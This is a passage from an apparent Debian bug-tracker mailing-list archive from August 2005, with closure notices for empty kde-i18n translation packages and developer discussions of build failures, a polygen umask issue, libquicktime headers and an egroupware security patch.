with message-id [EMAIL PROTECTED]
and subject line Bug#318665: fixed in kde-i18n 4:3.4.2-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 16 Jul 2005 22:14:19 +
From [EMAIL PROTECTED] Sat Jul 16 15:14:19 2005
Return-path: [EMAIL PROTECTED]
Received: from aamiens-151-1-76-57.w86-192.abo.wanadoo.fr (tonton.team1664.org) 
[86.192.123.57] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1DtuvL-0002I4-00; Sat, 16 Jul 2005 15:14:19 -0700
Received: from tonton by athlon2500.home.com with local (Exim 4.52)
id 1DtuvJ-rd-FD; Sun, 17 Jul 2005 00:14:17 +0200
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: tonton [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: kde-i18-fr: does not contains message catalogs (.mo files)
X-Mailer: reportbug 3.15
Date: Sun, 17 Jul 2005 00:14:17 +0200
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: kde-i18-fr
Version: 4:3.4.1-1
Severity: grave
Justification: renders package unusable


The package currently in experimental is almost empty.

kde-i18n-fr_3.3.2-2_all.deb 16248 KB14.04.2005
kde-i18n-fr_3.4.1-1_all.deb 1240 KB 13.07.2005


-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (990, 'unstable'), (550, 'testing'), (25, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12.1
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to fr_FR.UTF-8)

---
Received: (at 318665-close) by bugs.debian.org; 30 Aug 2005 08:23:29 +
From [EMAIL PROTECTED] Tue Aug 30 01:23:29 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA1Jq-0006sb-00; Tue, 30 Aug 2005 01:18:10 -0700
From: =?utf-8?b?Tm/DqGwgS8O2dGhl?= [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#318665: fixed in kde-i18n 4:3.4.2-1
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 01:18:10 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 4

Source: kde-i18n
Source-Version: 4:3.4.2-1

We believe that the bug you reported is fixed in the latest version of
kde-i18n, which is due to be installed in the Debian FTP archive:

kde-i18n-af_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-af_3.4.2-1_all.deb
kde-i18n-ar_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-ar_3.4.2-1_all.deb
kde-i18n-bg_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bg_3.4.2-1_all.deb
kde-i18n-bn_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bn_3.4.2-1_all.deb
kde-i18n-br_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-br_3.4.2-1_all.deb
kde-i18n-bs_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bs_3.4.2-1_all.deb
kde-i18n-ca_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-ca_3.4.2-1_all.deb
kde-i18n-cs_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-cs_3.4.2-1_all.deb
kde-i18n-cy_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-cy_3.4.2-1_all.deb
kde-i18n-da_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-da_3.4.2-1_all.deb
kde-i18n-de_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-de_3.4.2-1_all.deb
kde-i18n-el_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-el_3.4.2-1_all.deb
kde-i18n-engb_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-engb_3.4.2-1_all.deb
kde-i18n-eo_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-eo_3.4.2-1_all.deb
kde-i18n-es_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-es_3.4.2-1_all.deb
kde-i18n-et_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-et_3.4.2-1_all.deb
kde-i18n-eu_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-eu_3.4.2-1_all.deb
kde-i18n-fi_3.4.2-1_all.deb
  to 

Bug#323350: #323350: egroupware: Another XMLRPC vulnerability

2005-08-30 Thread Gregory Colpart
Hi,

This security bug seems not too hard to fix.
Egroupware project gives a patch : egw_1.0.9xmlrpcfix2.tgz

http://sourceforge.net/project/shownotes.php?release_id=350039

It only changes class.xmlrpc.*.php files

A patch for this bug :
http://www.evolix.org/debian/egroupware-1.0.0.007-2.dfsg.patch
84f23e68ad3cdecabcefb63edf13405b

Thanks,
-- 
Gregory Colpart [EMAIL PROTECTED]  GnuPG:1024D/C1027A0E
Evolix - Informatique et Logiciels Libres http://www.evolix.fr



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: your mail

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 325562 help
Bug#325562: zope-textindexng2_1:2.2.0-1(m68k/unstable/vault13): FTBFS on m68k
Tags were: sid
Tags added: help

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#318821: marked as done (kde-i18n-da is missing a lot of files)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 01:18:10 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#318821: fixed in kde-i18n 4:3.4.2-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 17 Jul 2005 22:55:12 +
From [EMAIL PROTECTED] Sun Jul 17 15:55:12 2005
Return-path: [EMAIL PROTECTED]
Received: from carlsberg.amagerkollegiet.dk [83.221.136.34] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1DuI2S-0005s3-00; Sun, 17 Jul 2005 15:55:12 -0700
Received: from grignard.amagerkollegiet.dk ([172.16.0.130])
by carlsberg.amagerkollegiet.dk with esmtp (Exim 4.50)
id 1DuI21-nS-9q; Mon, 18 Jul 2005 00:54:45 +0200
Received: from moffe by grignard.amagerkollegiet.dk with local (Exim 4.52)
id 1DuI21-0001oQ-23; Mon, 18 Jul 2005 00:54:45 +0200
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: =?iso-8859-1?q?Rasmus_B=F8g_Hansen?= [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: kde-i18n-da is missing a lot of files
X-Mailer: reportbug 3.15
Date: Mon, 18 Jul 2005 00:54:45 +0200
Message-Id: [EMAIL PROTECTED]
X-Amagerkollegiet-MailScanner: Found to be clean
X-Amagerkollegiet-MailScanner-From: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: kde-i18n-da
Version: 4:3.4.1-1
Severity: grave
Tags: experimental
Justification: renders package unusable


kde-i18n-da shrank with the latest upload to experimental from 27MB to
3.7MB. Apparently alle the .mo files are missing. Also it is no longer
possible to choose danish language in the control center. All KDE
programs speak english now.

I assume this is the same problem as #318665.

Regards
/Rasmus

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.13-rc3
Locale: LANG=da_DK, LC_CTYPE=da_DK (charmap=ISO-8859-1) (ignored: LC_ALL set to 
da_DK)

Versions of packages kde-i18n-da depends on:
ii  kdelibs4  4:3.4.1-1  core libraries for all KDE applica

kde-i18n-da recommends no packages.

-- no debconf information

---
Received: (at 318821-close) by bugs.debian.org; 30 Aug 2005 08:19:17 +
From [EMAIL PROTECTED] Tue Aug 30 01:19:17 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA1Jq-0006sj-00; Tue, 30 Aug 2005 01:18:10 -0700
From: =?utf-8?b?Tm/DqGwgS8O2dGhl?= [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#318821: fixed in kde-i18n 4:3.4.2-1
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 01:18:10 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 3

Source: kde-i18n
Source-Version: 4:3.4.2-1

We believe that the bug you reported is fixed in the latest version of
kde-i18n, which is due to be installed in the Debian FTP archive:

kde-i18n-af_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-af_3.4.2-1_all.deb
kde-i18n-ar_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-ar_3.4.2-1_all.deb
kde-i18n-bg_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bg_3.4.2-1_all.deb
kde-i18n-bn_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bn_3.4.2-1_all.deb
kde-i18n-br_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-br_3.4.2-1_all.deb
kde-i18n-bs_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bs_3.4.2-1_all.deb
kde-i18n-ca_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-ca_3.4.2-1_all.deb
kde-i18n-cs_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-cs_3.4.2-1_all.deb
kde-i18n-cy_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-cy_3.4.2-1_all.deb
kde-i18n-da_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-da_3.4.2-1_all.deb
kde-i18n-de_3.4.2-1_all.deb
  to 

Bug#319164: marked as done (kde-i18n-ru 3.4.1-1 is almost empty)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 01:18:10 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#319164: fixed in kde-i18n 4:3.4.2-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 20 Jul 2005 09:41:41 +
From [EMAIL PROTECTED] Wed Jul 20 02:41:41 2005
Return-path: [EMAIL PROTECTED]
Received: from www.dubki.ru (mail.dubki.ru) [195.225.129.2] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1DvB5A-00038a-00; Wed, 20 Jul 2005 02:41:41 -0700
X-SpamCatcher-Score: 64 [XX]
Received: from [172.16.4.21] (HELO sercond)
  by mail.dubki.ru (CommuniGate Pro SMTP 4.1.8)
  with ESMTP-TLS id 12342492; Wed, 20 Jul 2005 13:42:30 +0400
Received: from nikita by sercond with local (Exim 4.50)
id 1DvB5D-0001tr-AS; Wed, 20 Jul 2005 13:41:43 +0400
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Nikita V. Youshchenko [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: kde-i18n-ru 3.4.1-1 is almost empty
X-Mailer: reportbug 3.15
Date: Wed, 20 Jul 2005 13:41:43 +0400
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: kde-i18n-ru
Version: 4:3.4.1-1
Severity: grave
Tags: experimental
Justification: renders package unusable

Package kde-i18n-ru currently in experimental is almost empty.

-rw-r--r--  1 root root 6417008 2005-04-14 10:02 kde-i18n-ru_4%3a3.3.2-2_all.deb
-rw-r--r--  1 root root  381532 2005-07-14 02:32 kde-i18n-ru_4%3a3.4.1-1_all.deb

Package contains no interface translation, and almost no data.

This is caused by build error, in ru/docs/kdebase/kate.
Several docbook entities, representing authorss names and e-mail, are not
defined.

Same problem is also in kdebase/knetattach and kdebase/konsole.
If mentions of thse directories are removed from
ru/docs/kdebase/Makefile.in, the rest build ok, and resulting package
contains needed files.

I believe that package with such bug appeared in the archive because of
seriuos problem with kde-i18n's debuian/rules. It does not stop build if
make in subdirectory fails, and packages the result of broken build
silently.

-- System Information:
Debian Release: 3.1
  APT prefers proposed-updates
  APT policy: (640, 'proposed-updates'), (640, 'stable'), (620, 
'testing-proposed-updates'), (620, 'testing'), (600, 'unstable'), (550, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.8-2-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages kde-i18n-ru depends on:
ii  kdelibs4  4:3.4.1-1  core libraries for all KDE applica

kde-i18n-ru recommends no packages.

-- no debconf information

---
Received: (at 319164-close) by bugs.debian.org; 30 Aug 2005 08:23:28 +
From [EMAIL PROTECTED] Tue Aug 30 01:23:28 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA1Jq-0006sq-00; Tue, 30 Aug 2005 01:18:10 -0700
From: =?utf-8?b?Tm/DqGwgS8O2dGhl?= [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#319164: fixed in kde-i18n 4:3.4.2-1
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 01:18:10 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 5

Source: kde-i18n
Source-Version: 4:3.4.2-1

We believe that the bug you reported is fixed in the latest version of
kde-i18n, which is due to be installed in the Debian FTP archive:

kde-i18n-af_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-af_3.4.2-1_all.deb
kde-i18n-ar_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-ar_3.4.2-1_all.deb
kde-i18n-bg_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bg_3.4.2-1_all.deb
kde-i18n-bn_3.4.2-1_all.deb
  to pool/main/k/kde-i18n/kde-i18n-bn_3.4.2-1_all.deb
kde-i18n-br_3.4.2-1_all.deb
  to 

Bug#325679: marked as done (utidylib: FTBFS: Missing Build-Depends on 'python-dev')

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 01:47:07 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#325679: fixed in utidylib 0.2-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 30 Aug 2005 08:04:12 +
From [EMAIL PROTECTED] Tue Aug 30 01:04:12 2005
Return-path: [EMAIL PROTECTED]
Received: from c147112.adsl.hansenet.de (localhost.localdomain) 
[213.39.147.112] 
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EA16J-00012Q-00; Tue, 30 Aug 2005 01:04:12 -0700
Received: from aj by localhost.localdomain with local (Exim 4.52)
id 1EA16D-0002Ew-7b; Tue, 30 Aug 2005 10:04:05 +0200
To: Debian Bug Tracking System [EMAIL PROTECTED]
From: Andreas Jochens [EMAIL PROTECTED]
Subject: utidylib: FTBFS: Missing Build-Depends on 'python-dev'
Message-Id: [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 10:04:05 +0200
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: utidylib
Version: 0.2-1
Severity: serious
Tags: patch

When building 'utidylib' in a clean 'unstable' chroot,
I get the following error:

cd .  python setup.py build --build-base=./build
/bin/sh: python: command not found
make: *** [common-build-impl] Error 127

Please add the missing Build-Depends on 'python-dev'
to debian/control.

Regards
Andreas Jochens

diff -urN ../tmp-orig/utidylib-0.2/debian/control ./debian/control
--- ../tmp-orig/utidylib-0.2/debian/control 2005-08-30 07:48:06.0 
+
+++ ./debian/control2005-08-30 07:48:02.0 +
@@ -2,7 +2,7 @@
 Section: web
 Priority: optional
 Maintainer: Igor Stroh [EMAIL PROTECTED]
-Build-Depends-Indep: debhelper (= 4.1.38), cdbs, python2.3-dev, 
python2.4-dev, dpatch
+Build-Depends-Indep: debhelper (= 4.1.38), cdbs, python-dev, python2.3-dev, 
python2.4-dev, dpatch
 Standards-Version: 3.6.2.1
 
 Package: python-utidylib

---
Received: (at 325679-close) by bugs.debian.org; 30 Aug 2005 08:49:17 +
From [EMAIL PROTECTED] Tue Aug 30 01:49:17 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA1lr-fW-00; Tue, 30 Aug 2005 01:47:07 -0700
From: Igor Stroh [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#325679: fixed in utidylib 0.2-2
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 01:47:07 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: utidylib
Source-Version: 0.2-2

We believe that the bug you reported is fixed in the latest version of
utidylib, which is due to be installed in the Debian FTP archive:

python-utidylib_0.2-2_all.deb
  to pool/main/u/utidylib/python-utidylib_0.2-2_all.deb
python2.3-utidylib_0.2-2_all.deb
  to pool/main/u/utidylib/python2.3-utidylib_0.2-2_all.deb
python2.4-utidylib_0.2-2_all.deb
  to pool/main/u/utidylib/python2.4-utidylib_0.2-2_all.deb
utidylib_0.2-2.diff.gz
  to pool/main/u/utidylib/utidylib_0.2-2.diff.gz
utidylib_0.2-2.dsc
  to pool/main/u/utidylib/utidylib_0.2-2.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Igor Stroh [EMAIL PROTECTED] (supplier of updated utidylib package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 30 Aug 2005 10:27:34 +0200
Source: utidylib
Binary: python2.3-utidylib python2.4-utidylib python-utidylib
Architecture: source all
Version: 0.2-2
Distribution: unstable
Urgency: low
Maintainer: Igor Stroh [EMAIL PROTECTED]
Changed-By: Igor Stroh [EMAIL PROTECTED]
Description: 
 

Bug#325562: Processed: your mail

2005-08-30 Thread Andreas Tille

On Tue, 30 Aug 2005, Steve Langasek wrote:


Bug#325562: zope-textindexng2_1:2.2.0-1(m68k/unstable/vault13): FTBFS on m68k
Tags were: sid
Tags added: help


What kind of help are you looking for?  Is there no straightforward way
to override optimization flags for this package?  It seems that if
nothing else, setup.py should allow you to set ext_args = ['-O2'], which
is the policy-recommended optimization level for all architectures
anyway.


Well, I would at least love if someone *verified* the suggestion to
change the optimisation.  Uploading a new package and just *hoping*
that it will work seems not very clever.  If you think I should go
for it, I will do so.

Kind regards

   Andreas.

--
http://fam-tille.de


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Separate 320721 in two

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 clone 320721 -1
Bug#320721: capi4hylafax: c2faxrecv segfaults when an incoming faxtransmission 
enters
Bug 320721 cloned as bug 325704.

 retitle -1 Kernel oops with c2faxsend
Bug#325704: capi4hylafax: c2faxrecv segfaults when an incoming faxtransmission 
enters
Changed Bug title.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#323513: Processed: reassign 323513 to xlibs-static-dev, retitle 323513 to xlibs-static-dev missing depends on libxau-dev

2005-08-30 Thread David Martínez Moreno
El Lunes, 22 de Agosto de 2005 23:33, Debian Bug Tracking System escribió:
 Processing commands for [EMAIL PROTECTED]:
  # Automatically generated email from bts, devscripts version 2.9.5
  reassign 323513 xlibs-static-dev

 Bug#323513: FTBFS: Cannot include X11/Xauth.h
 Bug reassigned from package `gdm' to `xlibs-static-dev'.

  retitle 323513 xlibs-static-dev missing depends on libxau-dev

 Bug#323513: FTBFS: Cannot include X11/Xauth.h
 Changed Bug title.

Hello, Ryan.

You are not right in this action. xlibs-static-dev must not depend on 
libxau-dev, as the latter has dynamic shared object (libxau6). See the 
description of xlibs-static-dev:


 xlibs-static-dev provides static versions of the X Window System libraries
 (some of which, but not all, implement extensions to the X protocol) that do
 not exist in shared object form for various reasons (such as the fact that
 their APIs have not stabilized, or that they are deprecated).  Header files
 and manual pages are also provided.


This is not about a member of xlibs-static-dev depending on headers or 
things 
from libxau-dev, but about gpm depending indeed on it.

So if you do not have any objections, I am going to reassign this bug 
where 
it belongs to, that is, gpm, maybe tomorrow.

Best regards,


Ender.
-- 
El conceto es el conceto.
-- Pazos (Airbag).
--
Debian developer


pgplQfQKRyYUy.pgp
Description: PGP signature


Bug#325468: polygen: ignores umask

2005-08-30 Thread Enrico Zini
On Mon, Aug 29, 2005 at 12:26:09PM -0700, Steve Langasek wrote:

 You probably want some way instead to ensure that such files are created
 with 0644 mode if they're system-wide entries created by root; I see
 that you've closed this bug with a changelog entry saying to set the
 umask, but unless you're also setting the umask at some point there's no
 guarantee that the root user's umask is sanely configured, either.

Gosh, thanks, you are right: I have to set the umask in postinst when
generating the grammar objects.

Actually I've just learnt from upstream that the format of the grammar
objects should be arch-independent, so I intend to update the package to
build the .grm.o at package build time and get rid of the postinst at
all.

In the meantime, I'm reopening this bug.


Ciao,

Enrico

--
GPG key: 1024D/797EBFAB 2000-12-05 Enrico Zini [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Processed: reopening 325468

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.5
 reopen 325468
Bug#325468: polygen: ignores umask
Bug reopened, originator not changed.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325700: mozilla-firefox: The images are no longer displayed

2005-08-30 Thread Vincent Lefevre
On 2005-08-30 11:36:25 +0200, Vincent Lefevre wrote:
 The images (both in the interface, such as the toolbar buttons, and
 in the HTML documents[*]) are no longer displayed.

GIF images don't seem to be affected.

-- 
Vincent Lefèvre [EMAIL PROTECTED] - Web: http://www.vinc17.org/
100% accessible validated (X)HTML - Blog: http://www.vinc17.org/blog/
Work: CR INRIA - computer arithmetic / SPACES project at LORIA


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325562: Processed: your mail

2005-08-30 Thread Steve Langasek
On Tue, Aug 30, 2005 at 11:33:11AM +0200, Andreas Tille wrote:
 On Tue, 30 Aug 2005, Steve Langasek wrote:

 Bug#325562: zope-textindexng2_1:2.2.0-1(m68k/unstable/vault13): FTBFS on 
 m68k
 Tags were: sid
 Tags added: help

 What kind of help are you looking for?  Is there no straightforward way
 to override optimization flags for this package?  It seems that if
 nothing else, setup.py should allow you to set ext_args = ['-O2'], which
 is the policy-recommended optimization level for all architectures
 anyway.

 Well, I would at least love if someone *verified* the suggestion to
 change the optimisation.  Uploading a new package and just *hoping*
 that it will work seems not very clever.  If you think I should go
 for it, I will do so.

Well, there are a number of gcc bugs on m68k that are known to occur
only when using -O3; I don't know if this is one of them, but there is a
good chance that it is.  Unless you want to ask [EMAIL PROTECTED] to test
for you first, I think uploading is an ok solution.

Cheers,
-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/


signature.asc
Description: Digital signature


Bug#325647: FTBFS: quicktime/quicktime.h - lqt/quicktime.h

2005-08-30 Thread Daniel Kobras
On Mon, Aug 29, 2005 at 06:30:03PM -0700, Steve Langasek wrote:
 On Mon, Aug 29, 2005 at 06:54:47PM -0600, dann frazier wrote:
  kino looks for quicktime.h under /usr/include/quicktime, but it is installed
  under /usr/include/lqt.
 
 Which is rather unfortunate, since this seems to be a behavior change in
 libquicktime-dev between the testing and unstable versions.  I don't
 suppose libquicktime-dev could support a compatibility symlink...?

Diffing /usr/include/quicktime from testing and /usr/include/lqt from
unstable reveals that both versions are almost, but not quite
API-compatible. In particular, lqt_version.h explicitly has

-#define LQT_CODEC_API_VERSION 2
+#define LQT_CODEC_API_VERSION 3

There's only a handful of backwards-incompatible stuff, though, so it
might well be that a symlink hack works for most packages in Debian, but
I'd rather have a second opinion on that from someone more familiar with
libquicktime. Unfortunately, the maintainer appears to be awol recently
(Gerd, are you around?), and Christian stated he's not interested in
doing any further work on the package.

Regards,

Daniel.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325650: pbuilder create sid fails

2005-08-30 Thread Junichi Uekawa
Hi,

 Package: pbuilder
 Version: 0.128
 Severity: grave
 Justification: renders package unusable
 
 The command 'pbuilder create sid --debug' fails with this:

1. this is a bug with debootstrap.

2. this version of pbuilder is old.


I'm inclined to just close this bug; I'm feeling 
a deja-vu; is there a mail loop somewhere?



regards,
junichi



-- 
